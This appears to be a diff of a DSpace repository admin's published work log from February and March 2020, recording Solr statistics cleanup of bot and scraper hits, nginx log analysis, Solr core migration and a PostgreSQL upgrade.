+$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics-2018 -p
+Purging 684888 hits from 104.196.152.243 in statistics-2018
+Purging 323737 hits from 35.227.26.162 in statistics-2018
+Purging 221091 hits from 35.237.175.180 in statistics-2018
+Purging 3834 hits from 205.186.128.185 in statistics-2018
+Purging 20337 hits from 63.32.242.35 in statistics-2018
+
+Total number of bot hits purged: 1253887
+$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics-2017 -p
+Purging 1752548 hits from 104.196.152.243 in statistics-2017
+
+Total number of bot hits purged: 1752548
+
    +
  • I looked in the REST API logs for the past month and found a few more IPs: +
      +
    • 95.110.154.135 (BioversityBot)
    • +
    • 34.209.213.122 (IITA? bot)
    • +
    +
  • +
  • The client at 3.225.28.105 is using the following user agent:
  • +
+
Apache-HttpClient/4.3.4 (java 1.5)
+
    +
  • But I don’t see any hits for it in the statistics core for some reason
  • +
  • Looking more into the 2015 statistics I see some questionable IPs: +
      +
    • 50.115.121.196 has a DNS of saltlakecity2tr.monitis.com
    • +
    • 70.32.99.142 has userAgent Drupal
    • +
    • 104.130.164.111 was some scraper on Rackspace.com that made ~30,000 requests per month
    • +
    • 45.56.65.158 was some scraper on Linode that made ~30,000 requests per month
    • +
    • 23.97.198.40 was some scraper with an IP owned by Microsoft that made ~4,000 requests per month and had no user agent
    • +
    • 180.76.15.6 and dozens of other IPs with DNS like baiduspider-180-76-15-6.crawl.baidu.com. (and they were using a Mozilla/5.0 user agent!)
    • +
    +
  • +
  • For the IPs I purged them using check-spider-ip-hits.sh:
  • +
+
$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics -p
+Purging 11478 hits from 95.110.154.135 in statistics
+Purging 1208 hits from 34.209.213.122 in statistics
+Purging 10 hits from 54.184.39.242 in statistics
+
+Total number of bot hits purged: 12696
+$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics-2018 -p
+Purging 12572 hits from 95.110.154.135 in statistics-2018
+Purging 233 hits from 34.209.213.122 in statistics-2018
+
+Total number of bot hits purged: 12805
+$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics-2017 -p
+Purging 37503 hits from 95.110.154.135 in statistics-2017
+Purging 25 hits from 34.209.213.122 in statistics-2017
+Purging 8621 hits from 23.97.198.40 in statistics-2017
+
+Total number of bot hits purged: 46149
+$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics-2016 -p
+Purging 1476 hits from 95.110.154.135 in statistics-2016
+Purging 10490 hits from 70.32.99.142 in statistics-2016
+Purging 29519 hits from 50.115.121.196 in statistics-2016
+Purging 175758 hits from 45.56.65.158 in statistics-2016
+Purging 26279 hits from 23.97.198.40 in statistics-2016
+
+Total number of bot hits purged: 243522
+$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics-2015 -p
+Purging 49351 hits from 70.32.99.142 in statistics-2015
+Purging 30278 hits from 50.115.121.196 in statistics-2015
+Purging 172292 hits from 104.130.164.111 in statistics-2015
+Purging 78571 hits from 45.56.65.158 in statistics-2015
+Purging 16069 hits from 23.97.198.40 in statistics-2015
+
+Total number of bot hits purged: 346561
+$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics-2014 -p 
+Purging 462 hits from 70.32.99.142 in statistics-2014
+Purging 1766 hits from 50.115.121.196 in statistics-2014
+
+Total number of bot hits purged: 2228
+
    +
  • Then I purged about 200,000 Baidu hits from the 2015 to 2019 statistics cores with a few manual delete queries because they didn’t have a proper user agent and the only way to identify them was via DNS:
  • +
+
$ curl -s "http://localhost:8081/solr/statistics-2016/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>dns:*crawl.baidu.com.</query></delete>"
+
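    +
  • The same delete query can be looped over the other cores, roughly:
  • +
+
$ for core in statistics statistics-2018 statistics-2017 statistics-2015; do curl -s "http://localhost:8081/solr/${core}/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>dns:*crawl.baidu.com.</query></delete>"; done
+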
    +
  • Jesus, the more I keep looking, the more I see ridiculous stuff…
  • +
  • In 2019 there were a few hundred thousand requests from CodeObia on Orange Jordan network… +
      +
    • 79.173.222.114
    • +
    • 149.200.141.57
    • +
    • 86.108.89.91
    • +
    • And others…
    • +
    +
  • +
  • Also I see a CIAT IP 45.5.186.2 that was making hundreds of thousands of requests (and 100/sec at one point in 2019)
  • +
  • Also I see some IP on Hetzner making 10,000 requests per month: 2a01:4f8:210:51ef::2
  • +
  • Also I see some IP in Greece making 130,000 requests with weird user agents: 143.233.242.130
  • +
  • I purged a bunch more from all cores:
  • +
+
$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics -p     
+Purging 109965 hits from 45.5.186.2 in statistics
+Purging 78648 hits from 79.173.222.114 in statistics
+Purging 49032 hits from 149.200.141.57 in statistics
+Purging 26897 hits from 86.108.89.91 in statistics
+Purging 80898 hits from 2a01:4f8:210:51ef::2 in statistics
+Purging 130831 hits from 143.233.242.130 in statistics
+Purging 46489 hits from 83.103.94.48 in statistics
+
+Total number of bot hits purged: 522760
+$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics-2018 -p
+Purging 41574 hits from 45.5.186.2 in statistics-2018
+Purging 39620 hits from 2a01:4f8:210:51ef::2 in statistics-2018
+Purging 19325 hits from 83.103.94.48 in statistics-2018
+
+Total number of bot hits purged: 100519
+$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics-2017   
+Found 296 hits from 45.5.186.2 in statistics-2017
+Found 390 hits from 2a01:4f8:210:51ef::2 in statistics-2017
+Found 16086 hits from 83.103.94.48 in statistics-2017
+
+Total number of hits from bots: 16772
+$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics-2017 -p
+Purging 296 hits from 45.5.186.2 in statistics-2017
+Purging 390 hits from 2a01:4f8:210:51ef::2 in statistics-2017
+Purging 16086 hits from 83.103.94.48 in statistics-2017
+
+Total number of bot hits purged: 16772
+$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics-2016 -p
+Purging 394 hits from 2a01:4f8:210:51ef::2 in statistics-2016
+Purging 26519 hits from 83.103.94.48 in statistics-2016
+
+Total number of bot hits purged: 26913
+$ ./check-spider-ip-hits.sh -u http://localhost:8081/solr -f /tmp/ips.txt -s statistics-2015 -p
+Purging 1 hits from 143.233.242.130 in statistics-2015
+Purging 14109 hits from 83.103.94.48 in statistics-2015
+
+Total number of bot hits purged: 14110
+
    +
  • Though looking in my REST logs for the last month I am second guessing my judgement on 45.5.186.2 because I see user agents like “Microsoft Office Word 2014”
  • +
  • Actually no, the overwhelming majority of these are coming from something harvesting the REST API with no user agent:
  • +
+
# zgrep 45.5.186.2 /var/log/nginx/rest.log.[1234]* | awk -F\" '{print $6}' | sort | uniq -c | sort -h
+      1 Microsoft Office Word 2014
+      1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office)
+      1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
+      1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
+      2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
+      3 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
+     24 GuzzleHttp/6.3.3 curl/7.59.0 PHP/7.0.31
+     34 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
+     98 Apache-HttpClient/4.3.4 (java 1.5)
+  54850 -
+
    +
  • I see lots of requests coming from the following user agents:
  • +
+
"Apache-HttpClient/4.5.7 (Java/11.0.3)"
+"Apache-HttpClient/4.5.7 (Java/11.0.2)"
+"LinkedInBot/1.0 (compatible; Mozilla/5.0; Jakarta Commons-HttpClient/4.3 +http://www.linkedin.com)"
+"EventMachine HttpClient"
+
    +
  • I should definitely add HttpClient to the bot user agents…
  • +
  • Also, while bot, spider, and crawl are in the pattern list already and can be used for case-insensitive matching when used by DSpace in Java, I can’t do case-insensitive matching in Solr with check-spider-hits.sh +
      +
    • I need to add Bot, Spider, and Crawl to my local user agent file to purge them
    • +
    • Also, I see lots of hits from “Indy Library”, which we’ve been blocking for a long time, but somehow these got through (I think it’s the Greek guys using Delphi)
    • +
    • Somehow my regex conversion isn’t working in check-spider-hits.sh, but “Indy” will work for now
    • +
    • Purging just these case-sensitive patterns removed ~1 million more hits from 2011 to 2020
    • +
    +
  • +
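  • One quick way to generate case-class versions of the lowercase patterns for Solr (turning “bot” into “[Bb]ot” and so on) is a little awk, for example (file names here are just illustrative):
  • +
+
$ awk '{ print "[" toupper(substr($0,1,1)) substr($0,1,1) "]" substr($0,2) }' /tmp/lowercase-agents > /tmp/agents
+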
  • More weird user agents in 2019:
  • +
+
ecolink (+https://search.ecointernet.org/)
+ecoweb (+https://search.ecointernet.org/)
+EcoInternet http://www.ecointernet.org/
+EcoInternet http://ecointernet.org/
+

2020-02-25

+
    +
  • And what about the 950,000 hits from Online.net IPs with the following user agent:
  • +
+
Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)
+
    +
  • Over half of the requests were to Discover and Browse pages, and the rest were to actual item pages, but they were within seconds of each other, so I’m purging them all
  • +
  • I looked deeper in the Solr statistics and found a bunch more weird user agents:
  • +
+
LinkedInBot/1.0 (compatible; Mozilla/5.0; Jakarta Commons-HttpClient/4.3
+EventMachine HttpClient
+ecolink (+https://search.ecointernet.org/)
+ecoweb (+https://search.ecointernet.org/)
+EcoInternet http://www.ecointernet.org/
+EcoInternet http://ecointernet.org/
+Biosphere EcoSearch http://search.ecointernet.org/
+Typhoeus - https://github.com/typhoeus/typhoeus
+Citoid (Wikimedia tool; learn more at https://www.mediawiki.org/wiki/Citoid)
+node-fetch/1.0 (+https://github.com/bitinn/node-fetch)
+7Siters/1.08 (+https://7ooo.ru/siters/)
+sqlmap/1.0-dev-nongit-20190527 (http://sqlmap.org)
+sqlmap/1.3.4.14#dev (http://sqlmap.org)
+lua-resty-http/0.10 (Lua) ngx_lua/10000
+omgili/0.5 +http://omgili.com
+IZaBEE/IZaBEE-1.01 (Buzzing Abound The Web; https://izabee.com; info at izabee dot com)
+Twurly v1.1 (https://twurly.org)
+okhttp/3.11.0
+okhttp/3.10.0
+Pattern/2.6 +http://www.clips.ua.ac.be/pattern
+Link Check; EPrints 3.3.x;
+CyotekWebCopy/1.7 CyotekHTTP/2.0
+Adestra Link Checker: http://www.adestra.co.uk
+HTTPie/1.0.2
+
    +
  • I notice that some of these would be matched by the COUNTER-Robots list when DSpace uses it in Java because there we have more robust (and case-insensitive) matching +
      +
    • I created a temporary file of some of the patterns and converted them to use capitalization so I could run them through check-spider-hits.sh
    • +
    +
  • +
+
Link.?Check
+Http.?Client
+ecointernet
+
    +
  • That removes another 500,000 or so:
  • +
+
$ ./check-spider-hits.sh -u http://localhost:8081/solr -f /tmp/agents -s statistics -p
+Purging 253 hits from Jersey\/[0-9] in statistics
+Purging 7302 hits from Link.?Check in statistics
+Purging 85574 hits from Http.?Client in statistics
+Purging 495 hits from HTTPie\/[0-9] in statistics
+Purging 56726 hits from ecointernet in statistics
+
+Total number of bot hits purged: 150350
+$ ./check-spider-hits.sh -u http://localhost:8081/solr -f /tmp/agents -s statistics-2018 -p
+Purging 3442 hits from Link.?Check in statistics-2018
+Purging 21922 hits from Http.?Client in statistics-2018
+Purging 2120 hits from HTTPie\/[0-9] in statistics-2018
+Purging 10 hits from ecointernet in statistics-2018
+
+Total number of bot hits purged: 27494
+$ ./check-spider-hits.sh -u http://localhost:8081/solr -f /tmp/agents -s statistics-2017 -p
+Purging 6416 hits from Link.?Check in statistics-2017
+Purging 403402 hits from Http.?Client in statistics-2017
+Purging 12 hits from HTTPie\/[0-9] in statistics-2017
+Purging 6 hits from ecointernet in statistics-2017
+
+Total number of bot hits purged: 409836
+$ ./check-spider-hits.sh -u http://localhost:8081/solr -f /tmp/agents -s statistics-2016 -p
+Purging 2348 hits from Link.?Check in statistics-2016
+Purging 225664 hits from Http.?Client in statistics-2016
+Purging 15 hits from HTTPie\/[0-9] in statistics-2016
+
+Total number of bot hits purged: 228027
+$ ./check-spider-hits.sh -u http://localhost:8081/solr -f /tmp/agents -s statistics-2015 -p
+Purging 3459 hits from Link.?Check in statistics-2015
+Purging 263 hits from Http.?Client in statistics-2015
+Purging 15 hits from HTTPie\/[0-9] in statistics-2015
+
+Total number of bot hits purged: 3737
+$ ./check-spider-hits.sh -u http://localhost:8081/solr -f /tmp/agents -s statistics-2014 -p
+Purging 5 hits from Link.?Check in statistics-2014
+Purging 8 hits from Http.?Client in statistics-2014
+Purging 4 hits from HTTPie\/[0-9] in statistics-2014
+
+Total number of bot hits purged: 17
+$ ./check-spider-hits.sh -u http://localhost:8081/solr -f /tmp/agents -s statistics-2011 -p
+Purging 159 hits from Http.?Client in statistics-2011
+
+Total number of bot hits purged: 159
+
    +
  • Make pull requests for issues with user agents in the COUNTER-Robots repository: + +
  • +
  • One benefit of all this is that the size of the statistics Solr core has shrunk by 6GiB since yesterday, though I can’t remember how big it was before that +
      +
    • According to my notes it was 43GiB in January when it failed the first time
    • +
    • I wonder if the sharding process would work now…
    • +
    +
  • +
+

2020-02-26

+
    +
  • Bosede finally got back to me about the IITA records from earlier last month (IITA_201907_Jan13) +
      +
    • She said she has added more information to fifty-three of the journal articles, as I had requested
    • +
    +
  • +
  • I tried to migrate the 2019 Solr statistics again on CGSpace because the automatic sharding failed last month:
  • +
+
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m"
+$ schedtool -D -e ionice -c2 -n7 dspace stats-util -s >> log/cron-stats-util.log.$(date --iso-8601)
+
    +
  • Interestingly I saw this in the Solr log:
  • +
+
2020-02-26 08:55:47,433 INFO  org.apache.solr.core.SolrCore @ [statistics-2019] Opening new SolrCore at [dspace]/solr/statistics/, dataDir=[dspace]/solr/statistics-2019/data/
+2020-02-26 08:55:47,511 INFO  org.apache.solr.servlet.SolrDispatchFilter @ [admin] webapp=null path=/admin/cores params={dataDir=[dspace]/solr/statistics-2019/data&name=statistics-2019&action=CREATE&instanceDir=statistics&wt=javabin&version=2} status=0 QTime=590
+
    +
  • The process has been going for several hours now and I suspect it will fail eventually +
      +
    • I want to explore manually creating and migrating the core
    • +
    +
  • +
  • Manually create a core in the DSpace 6.4-SNAPSHOT instance on my local environment:
  • +
+
$ curl 'http://localhost:8080/solr/admin/cores?action=CREATE&name=statistics-2019&instanceDir=/home/aorth/dspace63/solr/statistics&dataDir=/home/aorth/dspace63/solr/statistics-2019/data'
+
    +
  • After that the statistics-2019 core was immediately available in the Solr UI, but after restarting Tomcat it was gone +
      +
    • I wonder if importing some old statistics into the current statistics core and then letting DSpace create the statistics-2019 core itself using dspace stats-util -s will work…
    • +
    +
  • +
  • First export a small slice of 2019 stats from the main CGSpace statistics core, skipping Atmire schema additions:
  • +
+
$ ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-2019-01-16.json -f 'time:2019-01-16*' -k uid -S author_mtdt,author_mtdt_search,iso_mtdt_search,iso_mtdt,subject_mtdt,subject_mtdt_search,containerCollection,containerCommunity,containerItem,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,geoipcountrycode,ip_ngram,ip_search,isArchived,isInternal,isWithdrawn,containerBitstream,file_id,referrer_ngram,referrer_search,userAgent_ngram,userAgent_search,version_id,complete_query,complete_query_search,filterquery,ngram_query_search,ngram_simplequery_search,simple_query,simple_query_search,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,actingGroupId,actorMemberGroupId,bitstreamCount,solr_update_time_stamp,bitstreamId
+
    +
  • Then import into my local statistics core:
  • +
+
$ ./run.sh -s http://localhost:8080/solr/statistics -a import -o ~/Downloads/statistics-2019-01-16.json -k uid
+$ ~/dspace63/bin/dspace stats-util -s
+Moving: 21993 into core statistics-2019
+
    +
  • To my surprise, the statistics-2019 core is created and the documents are immediately visible in the Solr UI! +
      +
    • Also, I am able to see the stats in DSpace’s default “View Usage Statistics” screen
    • +
    • Items appear with the words “(legacy)” at the end, ie “Improving farming practices in flood-prone areas in the Solomon Islands(legacy)”
    • +
    • Interestingly, if I make a bunch of requests for that item they will not be recognized as the same item, showing up as “Improving farming practices in flood-prone areas in the Solomon Islands” without the legacy identifier
    • +
    • I need to remember to test out the SolrUpgradePre6xStatistics tool
    • +
    +
  • +
  • After restarting my local Tomcat on DSpace 6.4-SNAPSHOT the statistics-2019 core loaded up… +
      +
    • I wonder what the difference is between the core I created and the one created by stats-util?
    • +
    • I’m honestly considering just moving everything back into one core…
    • +
    • Or perhaps I can export all the stats for 2019 by month, then delete everything, re-import each month, and migrate them with stats-util
    • +
    +
  • +
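  • If I do go the export/re-import route, exporting 2019 month by month should just be a loop over dateYearMonth with the same run.sh flags as above, something like:
  • +
+
$ for month in $(seq -w 1 12); do ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-2019-${month}.json -f "dateYearMonth:2019-${month}" -k uid; done
+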
  • A few hours later the sharding has completed successfully so I guess I don’t have to worry about this any more for now, though I’m seriously considering moving all my data back into the one statistics core
  • +
  • Testing some proposed patches for 6.4 in my local 6_x-dev64 branch
  • +
  • DS-4135 (citation author UTF-8) + +
  • +
+
<meta content="Thu hoạch v&agrave; bảo quản c&agrave; ph&ecirc; ch&egrave; đ&uacute;ng kỹ thuật (Harvesting and storing Arabica coffee)" name="citation_title">
+<meta name="citation_title" content="Thu hoạch và bảo quản cà phê chè đúng kỹ thuật (Harvesting and storing Arabica coffee)" />
+
+

2020-02-27

+
    +
  • Tezira started a discussion on Yammer about the ISI Journal field +
      +
    • She and Abenet both insist that selecting N/A for the “Journal status” in the submission form makes the item show ISI Journal on the item display page
    • +
    • I told them that the N/A does not store a value so this is impossible
    • +
    • I tested it to be sure on DSpace Test, and it does not show a value…
    • +
    • I checked this morning’s database snapshot and found three items that had a value of N/A, but they have already been fixed manually on CGSpace by Abenet or Tezira
    • +
    • I re-worded the N/A to say “Non-ISI Journal” in the submission form, though it still does not store a value
    • +
    +
  • +
  • I tested the last remaining issue with our 6.x-dev branch: the export CSV from search results + +
  • +
  • I added some debugging to the Solr core loading in DSpace 6.4-SNAPSHOT (SolrLoggerServiceImpl.java) and I see this when DSpace starts up now:
  • +
+
2020-02-27 12:26:35,695 INFO  org.dspace.statistics.SolrLoggerServiceImpl @ Alan Ping of Solr Core [statistics-2019] Failed with [org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException].  New Core Will be Created
+
    +
  • When I check Solr I see the statistics-2019 core loaded (from stats-util -s yesterday, not manually created)
  • +
+ + + + + + +
+ + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/2020-03/index.html b/docs/2020-03/index.html new file mode 100644 index 000000000..5f820c225 --- /dev/null +++ b/docs/2020-03/index.html @@ -0,0 +1,538 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + March, 2020 | CGSpace Notes + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + +
+
+

March, 2020

+ +
+

2020-03-02

+
    +
  • Update dspace-statistics-api for DSpace 6+ UUIDs +
      +
    • Tag version 1.2.0 on GitHub
    • +
    +
  • +
  • Test migrating legacy Solr statistics to UUIDs with the as-yet-unreleased SolrUpgradePre6xStatistics.java +
      +
    • You need to download this into the DSpace 6.x source and compile it
    • +
    +
  • +
+
$ export JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8"
+$ ~/dspace63/bin/dspace solr-upgrade-statistics-6x
+

2020-03-03

+
    +
  • Skype with Peter and Abenet to discuss the CG Core survey +
      +
    • We also discussed some other CGSpace issues
    • +
    +
  • +
+

2020-03-04

+
    +
  • Abenet asked me to add some new ILRI subjects to CGSpace +
      +
    • I updated the input-forms.xml in our 5_x-prod branch on GitHub
    • +
    • Abenet said we are changing HEALTH to HUMAN HEALTH so I need to fix those using my fix-metadata-values.py script:
    • +
    +
  • +
+
$ ./fix-metadata-values.py -i 2020-03-04-fix-1-ilri-subject.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.ilri -m 203 -t correct -d
+
    +
  • But I have not run it on CGSpace yet because we want to ask Peter if he is sure about it…
  • +
  • Send a message to Macaroni Bros to ask them about their Drupal module and its readiness for DSpace 6 UUIDs
  • +
+

2020-03-05

+ +
+

Lucene/Solr 7.0 was the first version that successfully passed our tests using Java 9 and higher. You should avoid Java 9 or later for Lucene/Solr 6.x or earlier.

+
+

2020-03-08

+
    +
  • I want to try to consolidate our yearly Solr statistics cores back into one statistics core using the solr-import-export-json tool
  • +
  • I will try it on DSpace test, doing one year at a time:
  • +
+
$ ./run.sh -s http://localhost:8081/solr/statistics-2010 -a export -o /tmp/statistics-2010.json -k uid
+$ ./run.sh -s http://localhost:8081/solr/statistics -a import -o /tmp/statistics-2010.json -k uid
+$ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>time:2010*</query></delete>"
+$ ./run.sh -s http://localhost:8081/solr/statistics-2011 -a export -o /tmp/statistics-2011.json -k uid
+$ ./run.sh -s http://localhost:8081/solr/statistics -a import -o /tmp/statistics-2011.json -k uid
+$ curl -s "http://localhost:8081/solr/statistics-2011/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>time:2011*</query></delete>"
+$ ./run.sh -s http://localhost:8081/solr/statistics -a import -o /tmp/statistics-2012.json -k uid
+$ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2012*&rows=0&wt=json&indent=true' | grep numFound
+  "response":{"numFound":3761989,"start":0,"docs":[]
+$ curl -s 'http://localhost:8081/solr/statistics-2012/select?q=time:2012*&rows=0&wt=json&indent=true' | grep numFound
+  "response":{"numFound":3761989,"start":0,"docs":[]
+$ curl -s "http://localhost:8081/solr/statistics-2012/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>time:2012*</query></delete>"
+
    +
  • I will do this for as many cores as I can (disk space limited) and then monitor the effect on the system and JVM memory usage +
      +
    • Exporting half years might work, using a filter query with months as a regular expression:
    • +
    +
  • +
+
$ ./run.sh -s http://localhost:8081/solr/statistics-2014 -a export -o /tmp/statistics-2014-1.json -k uid -f 'time:/2014-0[1-6].*/'
+
    +
  • Upgrade PostgreSQL from 9.6 to 10 on DSpace Test (linode19) +
      +
    • I’ve been running it for one month in my local environment, and others have reported on the dspace-tech mailing list that they are using 10 and 11
    • +
    +
  • +
+
# apt install postgresql-10 postgresql-contrib-10
+# systemctl stop tomcat7
+# pg_ctlcluster 9.6 main stop
+# tar -cvzpf var-lib-postgresql-9.6.tar.gz /var/lib/postgresql/9.6
+# tar -cvzpf etc-postgresql-9.6.tar.gz /etc/postgresql/9.6
+# pg_ctlcluster 10 main stop
+# pg_dropcluster 10 main
+# pg_upgradecluster 9.6 main
+# pg_dropcluster 9.6 main
+# dpkg -l | grep postgresql | grep 9.6 | awk '{print $2}' | xargs dpkg -r
+

2020-03-09

+
    +
  • Peter noticed that the Solr stats were not showing anything before 2020 +
      +
    • I had to restart Tomcat three times before all cores loaded properly…
    • +
    +
  • +
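  • A quick way to see which statistics cores Solr has actually loaded after a restart is the CoreAdmin STATUS action, something like:
  • +
+
$ curl -s 'http://localhost:8081/solr/admin/cores?action=STATUS&wt=json' | grep -oE '"name":"statistics[^"]*"'
+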
+

2020-03-10

+
    +
  • Fix some logic issues in the nginx config +
      +
    • Use generic blocking of [Bb]ot and [Cc]rawl and [Ss]pider in the “badbots” rate limiting logic instead of trying to list them all one by one (bots should not be trying to index dynamic pages no matter what so we punish hard here)
    • +
    • We were not properly forwarding the remote IP address to Tomcat in all nginx location blocks, which led some locations to log a hit from 127.0.0.1 (because we need to explicitly add the global proxy params when setting other headers in location blocks)
    • +
    • Unfortunately this affected the REST API and there are a few hundred thousand requests from this user agent:
    • +
    +
  • +
+
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 (.NET CLR 3.5.30729)
+
    +
  • It seems to only be a problem in the last week:
  • +
+
# zgrep -c 64.225.40.66 /var/log/nginx/rest.log.{1..9}
+/var/log/nginx/rest.log.1:0
+/var/log/nginx/rest.log.2:0
+/var/log/nginx/rest.log.3:0
+/var/log/nginx/rest.log.4:3625
+/var/log/nginx/rest.log.5:27458
+/var/log/nginx/rest.log.6:0
+/var/log/nginx/rest.log.7:0
+/var/log/nginx/rest.log.8:0
+/var/log/nginx/rest.log.9:0
+
    +
  • In Solr the IP is 127.0.0.1, but in the nginx logs I can luckily see the real IP (64.225.40.66), which is on Digital Ocean
  • +
  • I will purge them from Solr statistics:
  • +
+
$ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>userAgent:"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 (.NET CLR 3.5.30729)"</query></delete>'
+
    +
  • Another user agent that seems to be a bot is:
  • +
+
Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)
+
    +
  • In Solr the IP is 127.0.0.1 because of the misconfiguration, but in nginx’s logs I see it belongs to three IPs on Online.net in France:
  • +
+
# zcat /var/log/nginx/access.log.*.gz /var/log/nginx/rest.log.*.gz | grep 'Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)' | awk '{print $1}' | sort | uniq -c
+  63090 163.172.68.99
+ 183428 163.172.70.248
+ 147608 163.172.71.24
+
    +
  • It is making 10,000 to 40,000 requests to XMLUI per day…
  • +
+
# zgrep -c 'Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)' /var/log/nginx/access.log.{1..9}
+/var/log/nginx/access.log.30.gz:18687
+/var/log/nginx/access.log.31.gz:28936
+/var/log/nginx/access.log.32.gz:36402
+/var/log/nginx/access.log.33.gz:38886
+/var/log/nginx/access.log.34.gz:30607
+/var/log/nginx/access.log.35.gz:19040
+/var/log/nginx/access.log.36.gz:10780
+/var/log/nginx/access.log.37.gz:5808
+/var/log/nginx/access.log.38.gz:3100
+/var/log/nginx/access.log.39.gz:1485
+/var/log/nginx/access.log.3.gz:2898
+/var/log/nginx/access.log.40.gz:373
+/var/log/nginx/access.log.41.gz:3909
+/var/log/nginx/access.log.42.gz:4729
+/var/log/nginx/access.log.43.gz:3906
+
    +
  • I will purge those hits too!
  • +
+
$ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>userAgent:"Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)"</query></delete>'
+
    +
  • Shit, and something happened and a few thousand hits from user agents with “Bot” in their user agent got through +
      +
    • I need to re-run the check-spider-hits.sh script with the standard COUNTER-Robots list again, but add my own versions of a few because the script/Solr doesn’t support case-insensitive regular expressions:
    • +
    +
  • +
+
$ ./check-spider-hits.sh -f /tmp/bots -d -p
+(DEBUG) Using spiders pattern file: /tmp/bots
+(DEBUG) Checking for hits from spider: Citoid
+Purging 11 hits from Citoid in statistics
+(DEBUG) Checking for hits from spider: ecointernet
+Purging 375 hits from ecointernet in statistics
+(DEBUG) Checking for hits from spider: ^Pattern\/[0-9]
+Purging 1 hits from ^Pattern\/[0-9] in statistics
+(DEBUG) Checking for hits from spider: sqlmap
+(DEBUG) Checking for hits from spider: Typhoeus
+Purging 6 hits from Typhoeus in statistics
+(DEBUG) Checking for hits from spider: 7siters
+(DEBUG) Checking for hits from spider: Apache-HttpClient
+Purging 3178 hits from Apache-HttpClient in statistics
+
+Total number of bot hits purged: 3571
+
+$ ./check-spider-hits.sh -f /tmp/bots -d -p
+(DEBUG) Using spiders pattern file: /tmp/bots
+(DEBUG) Checking for hits from spider: [Bb]ot
+Purging 8317 hits from [Bb]ot in statistics
+(DEBUG) Checking for hits from spider: [Cc]rawl
+Purging 1314 hits from [Cc]rawl in statistics
+(DEBUG) Checking for hits from spider: [Ss]pider
+Purging 62 hits from [Ss]pider in statistics
+(DEBUG) Checking for hits from spider: Citoid
+(DEBUG) Checking for hits from spider: ecointernet
+(DEBUG) Checking for hits from spider: ^Pattern\/[0-9]
+(DEBUG) Checking for hits from spider: sqlmap
+(DEBUG) Checking for hits from spider: Typhoeus
+(DEBUG) Checking for hits from spider: 7siters
+(DEBUG) Checking for hits from spider: Apache-HttpClient
+

2020-03-11

+
    +
  • Ask Michael Victor for permission to create a new Linode server for DSpace Test
  • +
+

2020-03-12

+
    +
